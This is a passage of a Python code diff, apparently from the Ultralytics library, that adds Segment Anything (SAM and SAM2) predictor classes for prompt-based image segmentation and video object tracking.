None: + points = torch.as_tensor(points, dtype=torch.float32, device=self.device) + points = points[None] if points.ndim == 1 else points + # Assuming labels are all positive if users don't pass labels. + if labels is None: + labels = np.ones(points.shape[:-1]) + labels = torch.as_tensor(labels, dtype=torch.int32, device=self.device) + assert ( + points.shape[-2] == labels.shape[-1] + ), f"Number of points {points.shape[-2]} should match number of labels {labels.shape[-1]}." + points *= r + if points.ndim == 2: + # (N, 2) --> (N, 1, 2), (N, ) --> (N, 1) + points, labels = points[:, None, :], labels[:, None] + if bboxes is not None: + bboxes = torch.as_tensor(bboxes, dtype=torch.float32, device=self.device) + bboxes = bboxes[None] if bboxes.ndim == 1 else bboxes + bboxes *= r + if masks is not None: + masks = torch.as_tensor(masks, dtype=torch.float32, device=self.device).unsqueeze(1) + return bboxes, points, labels, masks + + def generate( + self, + im, + crop_n_layers=0, + crop_overlap_ratio=512 / 1500, + crop_downscale_factor=1, + point_grids=None, + points_stride=32, + points_batch_size=64, + conf_thres=0.88, + stability_score_thresh=0.95, + stability_score_offset=0.95, + crop_nms_thresh=0.7, + ): + """ + Perform image segmentation using the Segment Anything Model (SAM). + + This method segments an entire image into constituent parts by leveraging SAM's advanced architecture + and real-time performance capabilities. It can optionally work on image crops for finer segmentation. + + Args: + im (torch.Tensor): Input tensor representing the preprocessed image with shape (N, C, H, W). + crop_n_layers (int): Number of layers for additional mask predictions on image crops. + crop_overlap_ratio (float): Overlap between crops, scaled down in subsequent layers. + crop_downscale_factor (int): Scaling factor for sampled points-per-side in each layer. + point_grids (List[np.ndarray] | None): Custom grids for point sampling normalized to [0,1]. + points_stride (int): Number of points to sample along each side of the image. + points_batch_size (int): Batch size for the number of points processed simultaneously. + conf_thres (float): Confidence threshold [0,1] for filtering based on mask quality prediction. + stability_score_thresh (float): Stability threshold [0,1] for mask filtering based on stability. + stability_score_offset (float): Offset value for calculating stability score. + crop_nms_thresh (float): IoU cutoff for NMS to remove duplicate masks between crops. + + Returns: + pred_masks (torch.Tensor): Segmented masks with shape (N, H, W). + pred_scores (torch.Tensor): Confidence scores for each mask with shape (N,). + pred_bboxes (torch.Tensor): Bounding boxes for each mask with shape (N, 4). + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) # Example input image + >>> masks, scores, boxes = predictor.generate(im) + """ + import torchvision # scope for faster 'import ultralytics' + + self.segment_all = True + ih, iw = im.shape[2:] + crop_regions, layer_idxs = generate_crop_boxes((ih, iw), crop_n_layers, crop_overlap_ratio) + if point_grids is None: + point_grids = build_all_layer_point_grids(points_stride, crop_n_layers, crop_downscale_factor) + pred_masks, pred_scores, pred_bboxes, region_areas = [], [], [], [] + for crop_region, layer_idx in zip(crop_regions, layer_idxs): + x1, y1, x2, y2 = crop_region + w, h = x2 - x1, y2 - y1 + area = torch.tensor(w * h, device=im.device) + points_scale = np.array([[w, h]]) # w, h + # Crop image and interpolate to input size + crop_im = F.interpolate(im[..., y1:y2, x1:x2], (ih, iw), mode="bilinear", align_corners=False) + # (num_points, 2) + points_for_image = point_grids[layer_idx] * points_scale + crop_masks, crop_scores, crop_bboxes = [], [], [] + for (points,) in batch_iterator(points_batch_size, points_for_image): + pred_mask, pred_score = self.prompt_inference(crop_im, points=points, multimask_output=True) + # Interpolate predicted masks to input size + pred_mask = F.interpolate(pred_mask[None], (h, w), mode="bilinear", align_corners=False)[0] + idx = pred_score > conf_thres + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + + stability_score = calculate_stability_score( + pred_mask, self.model.mask_threshold, stability_score_offset + ) + idx = stability_score > stability_score_thresh + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + # Bool type is much more memory-efficient. + pred_mask = pred_mask > self.model.mask_threshold + # (N, 4) + pred_bbox = batched_mask_to_box(pred_mask).float() + keep_mask = ~is_box_near_crop_edge(pred_bbox, crop_region, [0, 0, iw, ih]) + if not torch.all(keep_mask): + pred_bbox, pred_mask, pred_score = pred_bbox[keep_mask], pred_mask[keep_mask], pred_score[keep_mask] + + crop_masks.append(pred_mask) + crop_bboxes.append(pred_bbox) + crop_scores.append(pred_score) + + # Do nms within this crop + crop_masks = torch.cat(crop_masks) + crop_bboxes = torch.cat(crop_bboxes) + crop_scores = torch.cat(crop_scores) + keep = torchvision.ops.nms(crop_bboxes, crop_scores, self.args.iou) # NMS + crop_bboxes = uncrop_boxes_xyxy(crop_bboxes[keep], crop_region) + crop_masks = uncrop_masks(crop_masks[keep], crop_region, ih, iw) + crop_scores = crop_scores[keep] + + pred_masks.append(crop_masks) + pred_bboxes.append(crop_bboxes) + pred_scores.append(crop_scores) + region_areas.append(area.expand(len(crop_masks))) + + pred_masks = torch.cat(pred_masks) + pred_bboxes = torch.cat(pred_bboxes) + pred_scores = torch.cat(pred_scores) + region_areas = torch.cat(region_areas) + + # Remove duplicate masks between crops + if len(crop_regions) > 1: + scores = 1 / region_areas + keep = torchvision.ops.nms(pred_bboxes, scores, crop_nms_thresh) + pred_masks, pred_bboxes, pred_scores = pred_masks[keep], pred_bboxes[keep], pred_scores[keep] + + return pred_masks, pred_scores, pred_bboxes + + def setup_model(self, model=None, verbose=True): + """ + Initializes the Segment Anything Model (SAM) for inference. + + This method sets up the SAM model by allocating it to the appropriate device and initializing the necessary + parameters for image normalization and other Ultralytics compatibility settings. + + Args: + model (torch.nn.Module | None): A pretrained SAM model. If None, a new model is built based on config. + verbose (bool): If True, prints selected device information. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model=sam_model, verbose=True) + """ + device = select_device(self.args.device, verbose=verbose) + if model is None: + model = self.get_model() + model.eval() + self.model = model.to(device) + self.device = device + self.mean = torch.tensor([123.675, 116.28, 103.53]).view(-1, 1, 1).to(device) + self.std = torch.tensor([58.395, 57.12, 57.375]).view(-1, 1, 1).to(device) + + # Ultralytics compatibility settings + self.model.pt = False + self.model.triton = False + self.model.stride = 32 + self.model.fp16 = False + self.done_warmup = True + + def get_model(self): + """Retrieves or builds the Segment Anything Model (SAM) for image segmentation tasks.""" + return build_sam(self.args.model) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes SAM's inference outputs to generate object detection masks and bounding boxes. + + This method scales masks and boxes to the original image size and applies a threshold to the mask + predictions. It leverages SAM's advanced architecture for real-time, promptable segmentation tasks. + + Args: + preds (Tuple[torch.Tensor]): The output from SAM model inference, containing: + - pred_masks (torch.Tensor): Predicted masks with shape (N, 1, H, W). + - pred_scores (torch.Tensor): Confidence scores for each mask with shape (N, 1). + - pred_bboxes (torch.Tensor, optional): Predicted bounding boxes if segment_all is True. + img (torch.Tensor): The processed input image tensor with shape (C, H, W). + orig_imgs (List[np.ndarray] | torch.Tensor): The original, unprocessed images. + + Returns: + results (List[Results]): List of Results objects containing detection masks, bounding boxes, and other + metadata for each processed image. + + Examples: + >>> predictor = Predictor() + >>> preds = predictor.inference(img) + >>> results = predictor.postprocess(preds, img, orig_imgs) + """ + # (N, 1, H, W), (N, 1) + pred_masks, pred_scores = preds[:2] + pred_bboxes = preds[2] if self.segment_all else None + names = dict(enumerate(str(i) for i in range(len(pred_masks)))) + + if not isinstance(orig_imgs, list): # input images are a torch.Tensor, not a list + orig_imgs = ops.convert_torch2numpy_batch(orig_imgs) + + results = [] + for masks, orig_img, img_path in zip([pred_masks], orig_imgs, self.batch[0]): + if len(masks) == 0: + masks, pred_bboxes = None, torch.zeros((0, 6), device=pred_masks.device) + else: + masks = ops.scale_masks(masks[None].float(), orig_img.shape[:2], padding=False)[0] + masks = masks > self.model.mask_threshold # to bool + if pred_bboxes is not None: + pred_bboxes = ops.scale_boxes(img.shape[2:], pred_bboxes.float(), orig_img.shape, padding=False) + else: + pred_bboxes = batched_mask_to_box(masks) + # NOTE: SAM models do not return cls info. This `cls` here is just a placeholder for consistency. + cls = torch.arange(len(pred_masks), dtype=torch.int32, device=pred_masks.device) + pred_bboxes = torch.cat([pred_bboxes, pred_scores[:, None], cls[:, None]], dim=-1) + results.append(Results(orig_img, path=img_path, names=names, masks=masks, boxes=pred_bboxes)) + # Reset segment-all mode. + self.segment_all = False + return results + + def setup_source(self, source): + """ + Sets up the data source for inference. + + This method configures the data source from which images will be fetched for inference. It supports + various input types such as image files, directories, video files, and other compatible data sources. + + Args: + source (str | Path | None): The path or identifier for the image data source. Can be a file path, + directory path, URL, or other supported source types. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_source("path/to/images") + >>> predictor.setup_source("video.mp4") + >>> predictor.setup_source(None) # Uses default source if available + + Notes: + - If source is None, the method may use a default source if configured. + - The method adapts to different source types and prepares them for subsequent inference steps. + - Supported source types may include local files, directories, URLs, and video streams. + """ + if source is not None: + super().setup_source(source) + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference. + + This method prepares the model for inference on a single image by setting up the model if not already + initialized, configuring the data source, and preprocessing the image for feature extraction. It + ensures that only one image is set at a time and extracts image features for subsequent use. + + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing + an image read by cv2. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(cv2.imread("path/to/image.jpg")) + + Notes: + - This method should be called before performing inference on a new image. + - The extracted features are stored in the `self.features` attribute for later use. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" + for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features using the SAM model's image encoder for subsequent mask prediction.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + return self.model.image_encoder(im) + + def set_prompts(self, prompts): + """Sets prompts for subsequent inference operations.""" + self.prompts = prompts + + def reset_image(self): + """Resets the current image and its features, clearing them for subsequent inference.""" + self.im = None + self.features = None + + @staticmethod + def remove_small_regions(masks, min_area=0, nms_thresh=0.7): + """ + Remove small disconnected regions and holes from segmentation masks. + + This function performs post-processing on segmentation masks generated by the Segment Anything Model (SAM). + It removes small disconnected regions and holes from the input masks, and then performs Non-Maximum + Suppression (NMS) to eliminate any newly created duplicate boxes. + + Args: + masks (torch.Tensor): Segmentation masks to be processed, with shape (N, H, W) where N is the number of + masks, H is height, and W is width. + min_area (int): Minimum area threshold for removing disconnected regions and holes. Regions smaller than + this will be removed. + nms_thresh (float): IoU threshold for the NMS algorithm to remove duplicate boxes. + + Returns: + new_masks (torch.Tensor): Processed masks with small regions removed, shape (N, H, W). + keep (List[int]): Indices of remaining masks after NMS, for filtering corresponding boxes. + + Examples: + >>> masks = torch.rand(5, 640, 640) > 0.5 # 5 random binary masks + >>> new_masks, keep = remove_small_regions(masks, min_area=100, nms_thresh=0.7) + >>> print(f"Original masks: {masks.shape}, Processed masks: {new_masks.shape}") + >>> print(f"Indices of kept masks: {keep}") + """ + import torchvision # scope for faster 'import ultralytics' + + if len(masks) == 0: + return masks + + # Filter small disconnected regions and holes + new_masks = [] + scores = [] + for mask in masks: + mask = mask.cpu().numpy().astype(np.uint8) + mask, changed = remove_small_regions(mask, min_area, mode="holes") + unchanged = not changed + mask, changed = remove_small_regions(mask, min_area, mode="islands") + unchanged = unchanged and not changed + + new_masks.append(torch.as_tensor(mask).unsqueeze(0)) + # Give score=0 to changed masks and 1 to unchanged masks so NMS prefers masks not needing postprocessing + scores.append(float(unchanged)) + + # Recalculate boxes and remove any new duplicates + new_masks = torch.cat(new_masks, dim=0) + boxes = batched_mask_to_box(new_masks) + keep = torchvision.ops.nms(boxes.float(), torch.as_tensor(scores), nms_thresh) + + return new_masks[keep].to(device=masks.device, dtype=masks.dtype), keep + + +class SAM2Predictor(Predictor): + """ + SAM2Predictor class for advanced image segmentation using Segment Anything Model 2 architecture. + + This class extends the base Predictor class to implement SAM2-specific functionality for image + segmentation tasks. It provides methods for model initialization, feature extraction, and + prompt-based inference. + + Attributes: + _bb_feat_sizes (List[Tuple[int, int]]): Feature sizes for different backbone levels. + model (torch.nn.Module): The loaded SAM2 model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + features (Dict[str, torch.Tensor]): Cached image features for efficient inference. + segment_all (bool): Flag to indicate if all segments should be predicted. + prompts (Dict): Dictionary to store various types of prompts for inference. + + Methods: + get_model: Retrieves and initializes the SAM2 model. + prompt_inference: Performs image segmentation inference based on various prompts. + set_image: Preprocesses and sets a single image for inference. + get_im_features: Extracts and processes image features using SAM2's image encoder. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> predictor.set_image("path/to/image.jpg") + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, _ = predictor.prompt_inference(predictor.im, bboxes=bboxes) + >>> print(f"Predicted {len(masks)} masks with average score {scores.mean():.2f}") + """ + + _bb_feat_sizes = [ + (256, 256), + (128, 128), + (64, 64), + ] + + def get_model(self): + """Retrieves and initializes the Segment Anything Model 2 (SAM2) for image segmentation tasks.""" + return build_sam(self.args.model) + + def prompt_inference( + self, + im, + bboxes=None, + points=None, + labels=None, + masks=None, + multimask_output=False, + img_idx=-1, + ): + """ + Performs image segmentation inference based on various prompts using SAM2 architecture. + + This method leverages the Segment Anything Model 2 (SAM2) to generate segmentation masks for input images + based on provided prompts such as bounding boxes, points, or existing masks. It supports both single and + multi-object prediction scenarios. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List[List[float]] | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List[List[float]] | None): Object location points with shape (N, 2), in pixels. + labels (np.ndarray | List[int] | None): Point prompt labels with shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions with shape (N, H, W). + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. + img_idx (int): Index of the image in the batch to process. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. + (np.ndarray): Quality scores for each mask, with length C. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> image = torch.rand(1, 3, 640, 640) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(image, bboxes=bboxes) + >>> print(f"Generated {masks.shape[0]} masks with average score {scores.mean():.2f}") + + Notes: + - The method supports batched inference for multiple objects when points or bboxes are provided. + - Input prompts (bboxes, points) are automatically scaled to match the input image dimensions. + - When both bboxes and points are provided, they are merged into a single 'points' input for the model. + + References: + - SAM2 Paper: [Add link to SAM2 paper when available] + """ + features = self.get_im_features(im) if self.features is None else self.features + + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + + sparse_embeddings, dense_embeddings = self.model.sam_prompt_encoder( + points=points, + boxes=None, + masks=masks, + ) + # Predict masks + batched_mode = points is not None and points[0].shape[0] > 1 # multi object prediction + high_res_features = [feat_level[img_idx].unsqueeze(0) for feat_level in features["high_res_feats"]] + pred_masks, pred_scores, _, _ = self.model.sam_mask_decoder( + image_embeddings=features["image_embed"][img_idx].unsqueeze(0), + image_pe=self.model.sam_prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + repeat_image=batched_mode, + high_res_features=high_res_features, + ) + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (tuple): A tuple containing transformed points, labels, and masks. + """ + bboxes, points, labels, masks = super()._prepare_prompts(dst_shape, bboxes, points, labels, masks) + if bboxes is not None: + bboxes = bboxes.view(-1, 2, 2) + bbox_labels = torch.tensor([[2, 3]], dtype=torch.int32, device=bboxes.device).expand(len(bboxes), -1) + # NOTE: merge "boxes" and "points" into a single "points" input + # (where boxes are added at the beginning) to model.sam_prompt_encoder + if points is not None: + points = torch.cat([bboxes, points], dim=1) + labels = torch.cat([bbox_labels, labels], dim=1) + else: + points, labels = bboxes, bbox_labels + return points, labels, masks + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference using the SAM2 model. + + This method initializes the model if not already done, configures the data source to the specified image, + and preprocesses the image for feature extraction. It supports setting only one image at a time. + + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing the image. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = SAM2Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(np.array([...])) # Using a numpy array + + Notes: + - This method must be called before performing any inference on a new image. + - The method caches the extracted features for efficient subsequent inferences on the same image. + - Only one image can be set at a time. To process multiple images, call this method for each new image. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" + for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features from the SAM image encoder for subsequent processing.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM 2 models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + self._bb_feat_sizes = [[x // (4 * i) for x in self.imgsz] for i in [1, 2, 4]] + + backbone_out = self.model.forward_image(im) + _, vision_feats, _, _ = self.model._prepare_backbone_features(backbone_out) + if self.model.directly_add_no_mem_embed: + vision_feats[-1] = vision_feats[-1] + self.model.no_mem_embed + feats = [ + feat.permute(1, 2, 0).view(1, -1, *feat_size) + for feat, feat_size in zip(vision_feats[::-1], self._bb_feat_sizes[::-1]) + ][::-1] + return {"image_embed": feats[-1], "high_res_feats": feats[:-1]} + + +class SAM2VideoPredictor(SAM2Predictor): + """ + SAM2VideoPredictor to handle user interactions with videos and manage inference states. + + This class extends the functionality of SAM2Predictor to support video processing and maintains + the state of inference operations. It includes configurations for managing non-overlapping masks, + clearing memory for non-conditional inputs, and setting up callbacks for prediction events. + + Attributes: + inference_state (Dict): A dictionary to store the current state of inference operations. + non_overlap_masks (bool): A flag indicating whether masks should be non-overlapping. + clear_non_cond_mem_around_input (bool): A flag to control clearing non-conditional memory around inputs. + clear_non_cond_mem_for_multi_obj (bool): A flag to control clearing non-conditional memory for multi-object scenarios. + callbacks (Dict): A dictionary of callbacks for various prediction lifecycle events. + + Args: + cfg (Dict, Optional): Configuration settings for the predictor. Defaults to DEFAULT_CFG. + overrides (Dict, Optional): Additional configuration overrides. Defaults to None. + _callbacks (List, Optional): Custom callbacks to be added. Defaults to None. + + Note: + The `fill_hole_area` attribute is defined but not used in the current implementation. + """ + + # fill_hole_area = 8 # not used + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the predictor with configuration and optional overrides. + + This constructor initializes the SAM2VideoPredictor with a given configuration, applies any + specified overrides, and sets up the inference state along with certain flags + that control the behavior of the predictor. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. + + Examples: + >>> predictor = SAM2VideoPredictor(cfg=DEFAULT_CFG) + >>> predictor = SAM2VideoPredictor(overrides={"imgsz": 640}) + >>> predictor = SAM2VideoPredictor(_callbacks={"on_predict_start": custom_callback}) + """ + super().__init__(cfg, overrides, _callbacks) + self.inference_state = {} + self.non_overlap_masks = True + self.clear_non_cond_mem_around_input = False + self.clear_non_cond_mem_for_multi_obj = False + self.callbacks["on_predict_start"].append(self.init_state) + + def get_model(self): + """ + Retrieves and configures the model with binarization enabled. + + Note: + This method overrides the base class implementation to set the binarize flag to True. + """ + model = super().get_model() + model.set_binarize(True) + return model + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. This + method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt encoder, and + mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List, optional): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List, optional): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List, optional): Labels for point prompts, shape (N, ). 1 = foreground, 0 = background. + masks (np.ndarray, optional): Low-resolution masks from previous predictions shape (N,H,W). For SAM H=W=256. + + Returns: + (np.ndarray): The output masks in shape CxHxW, where C is the number of generated masks. + (np.ndarray): An array of length C containing quality scores predicted by the model for each mask. + """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + + frame = self.dataset.frame + self.inference_state["im"] = im + output_dict = self.inference_state["output_dict"] + if len(output_dict["cond_frame_outputs"]) == 0: # initialize prompts + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + if points is not None: + for i in range(len(points)): + self.add_new_prompts(obj_id=i, points=points[[i]], labels=labels[[i]], frame_idx=frame) + elif masks is not None: + for i in range(len(masks)): + self.add_new_prompts(obj_id=i, masks=masks[[i]], frame_idx=frame) + self.propagate_in_video_preflight() + + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + batch_size = len(self.inference_state["obj_idx_to_id"]) + if len(output_dict["cond_frame_outputs"]) == 0: + raise RuntimeError("No points are provided; please add points first") + + if frame in consolidated_frame_inds["cond_frame_outputs"]: + storage_key = "cond_frame_outputs" + current_out = output_dict[storage_key][frame] + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame) + elif frame in consolidated_frame_inds["non_cond_frame_outputs"]: + storage_key = "non_cond_frame_outputs" + current_out = output_dict[storage_key][frame] + else: + storage_key = "non_cond_frame_outputs" + current_out = self._run_single_frame_inference( + output_dict=output_dict, + frame_idx=frame, + batch_size=batch_size, + is_init_cond_frame=False, + point_inputs=None, + mask_inputs=None, + reverse=False, + run_mem_encoder=True, + ) + output_dict[storage_key][frame] = current_out + # Create slices of per-object outputs for subsequent interaction with each + # individual object after tracking. + self._add_output_per_object(frame, current_out, storage_key) + self.inference_state["frames_already_tracked"].append(frame) + pred_masks = current_out["pred_masks"].flatten(0, 1) + pred_masks = pred_masks[(pred_masks > self.model.mask_threshold).sum((1, 2)) > 0] # filter blank masks + + return pred_masks, torch.ones(len(pred_masks), dtype=pred_masks.dtype, device=pred_masks.device) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes the predictions to apply non-overlapping constraints if required. + + This method extends the post-processing functionality by applying non-overlapping constraints + to the predicted masks if the `non_overlap_masks` flag is set to True. This ensures that + the masks do not overlap, which can be useful for certain applications. + + Args: + preds (Tuple[torch.Tensor]): The predictions from the model. + img (torch.Tensor): The processed image tensor. + orig_imgs (List[np.ndarray]): The original images before processing. + + Returns: + results (list): The post-processed predictions. + + Note: + If `non_overlap_masks` is True, the method applies constraints to ensure non-overlapping masks. + """ + results = super().postprocess(preds, img, orig_imgs) + if self.non_overlap_masks: + for result in results: + if result.masks is None or len(result.masks) == 0: + continue + result.masks.data = self.model._apply_non_overlapping_constraints(result.masks.data.unsqueeze(0))[0] + return results + + @smart_inference_mode() + def add_new_prompts( + self, + obj_id, + points=None, + labels=None, + masks=None, + frame_idx=0, + ): + """ + Adds new points or masks to a specific frame for a given object ID. + + This method updates the inference state with new prompts (points or masks) for a specified + object and frame index. It ensures that the prompts are either points or masks, but not both, + and updates the internal state accordingly. It also handles the generation of new segmentations + based on the provided prompts and the existing state. + + Args: + obj_id (int): The ID of the object to which the prompts are associated. + points (torch.Tensor, Optional): The coordinates of the points of interest. Defaults to None. + labels (torch.Tensor, Optional): The labels corresponding to the points. Defaults to None. + masks (torch.Tensor, optional): Binary masks for the object. Defaults to None. + frame_idx (int, optional): The index of the frame to which the prompts are applied. Defaults to 0. + + Returns: + (tuple): A tuple containing the flattened predicted masks and a tensor of ones indicating the number of objects. + + Raises: + AssertionError: If both `masks` and `points` are provided, or neither is provided. + + Note: + - Only one type of prompt (either points or masks) can be added per call. + - If the frame is being tracked for the first time, it is treated as an initial conditioning frame. + - The method handles the consolidation of outputs and resizing of masks to the original video resolution. + """ + assert (masks is None) ^ (points is None), "'masks' and 'points' prompts are not compatible with each other." + obj_idx = self._obj_id_to_idx(obj_id) + + point_inputs = None + pop_key = "point_inputs_per_obj" + if points is not None: + point_inputs = {"point_coords": points, "point_labels": labels} + self.inference_state["point_inputs_per_obj"][obj_idx][frame_idx] = point_inputs + pop_key = "mask_inputs_per_obj" + self.inference_state["mask_inputs_per_obj"][obj_idx][frame_idx] = masks + self.inference_state[pop_key][obj_idx].pop(frame_idx, None) + # If this frame hasn't been tracked before, we treat it as an initial conditioning + # frame, meaning that the inputs points are to generate segments on this frame without + # using any memory from other frames, like in SAM. Otherwise (if it has been tracked), + # the input points will be used to correct the already tracked masks. + is_init_cond_frame = frame_idx not in self.inference_state["frames_already_tracked"] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + # Add a frame to conditioning output if it's an initial conditioning frame or + # if the model sees all frames receiving clicks/mask as conditioning frames. + is_cond = is_init_cond_frame or self.model.add_all_frames_to_correct_as_cond + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Get any previously predicted mask logits on this object and feed it along with + # the new clicks into the SAM mask decoder. + prev_sam_mask_logits = None + # lookup temporary output dict first, which contains the most recent output + # (if not found, then lookup conditioning and non-conditioning frame output) + if point_inputs is not None: + prev_out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + + if prev_out is not None and prev_out.get("pred_masks") is not None: + prev_sam_mask_logits = prev_out["pred_masks"].to(device=self.device, non_blocking=True) + # Clamp the scale of prev_sam_mask_logits to avoid rare numerical issues. + prev_sam_mask_logits.clamp_(-32.0, 32.0) + current_out = self._run_single_frame_inference( + output_dict=obj_output_dict, # run on the slice of a single object + frame_idx=frame_idx, + batch_size=1, # run on the slice of a single object + is_init_cond_frame=is_init_cond_frame, + point_inputs=point_inputs, + mask_inputs=masks, + reverse=False, + # Skip the memory encoder when adding clicks or mask. We execute the memory encoder + # at the beginning of `propagate_in_video` (after user finalize their clicks). This + # allows us to enforce non-overlapping constraints on all objects before encoding + # them into memory. + run_mem_encoder=False, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + # Add the output to the output dict (to be used as future memory) + obj_temp_output_dict[storage_key][frame_idx] = current_out + + # Resize the output mask to the original video resolution + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, + is_cond=is_cond, + run_mem_encoder=False, + ) + pred_masks = consolidated_out["pred_masks"].flatten(0, 1) + return pred_masks.flatten(0, 1), torch.ones(1, dtype=pred_masks.dtype, device=pred_masks.device) + + @smart_inference_mode() + def propagate_in_video_preflight(self): + """ + Prepare inference_state and consolidate temporary outputs before tracking. + + This method marks the start of tracking, disallowing the addition of new objects until the session is reset. + It consolidates temporary outputs from `temp_output_dict_per_obj` and merges them into `output_dict`. + Additionally, it clears non-conditioning memory around input frames and ensures that the state is consistent + with the provided inputs. + """ + # Tracking has started and we don't allow adding new objects until session is reset. + self.inference_state["tracking_has_started"] = True + batch_size = len(self.inference_state["obj_idx_to_id"]) + + # Consolidate per-object temporary outputs in "temp_output_dict_per_obj" and + # add them into "output_dict". + temp_output_dict_per_obj = self.inference_state["temp_output_dict_per_obj"] + output_dict = self.inference_state["output_dict"] + # "consolidated_frame_inds" contains indices of those frames where consolidated + # temporary outputs have been added (either in this call or any previous calls + # to `propagate_in_video_preflight`). + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + for is_cond in {False, True}: + # Separately consolidate conditioning and non-conditioning temp outptus + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + # Find all the frames that contain temporary outputs for any objects + # (these should be the frames that have just received clicks for mask inputs + # via `add_new_points` or `add_new_mask`) + temp_frame_inds = set() + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + temp_frame_inds.update(obj_temp_output_dict[storage_key].keys()) + consolidated_frame_inds[storage_key].update(temp_frame_inds) + # consolidate the temprary output across all objects on this frame + for frame_idx in temp_frame_inds: + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, is_cond=is_cond, run_mem_encoder=True + ) + # merge them into "output_dict" and also create per-object slices + output_dict[storage_key][frame_idx] = consolidated_out + self._add_output_per_object(frame_idx, consolidated_out, storage_key) + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame_idx) + + # clear temporary outputs in `temp_output_dict_per_obj` + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + obj_temp_output_dict[storage_key].clear() + + # edge case: if an output is added to "cond_frame_outputs", we remove any prior + # output on the same frame in 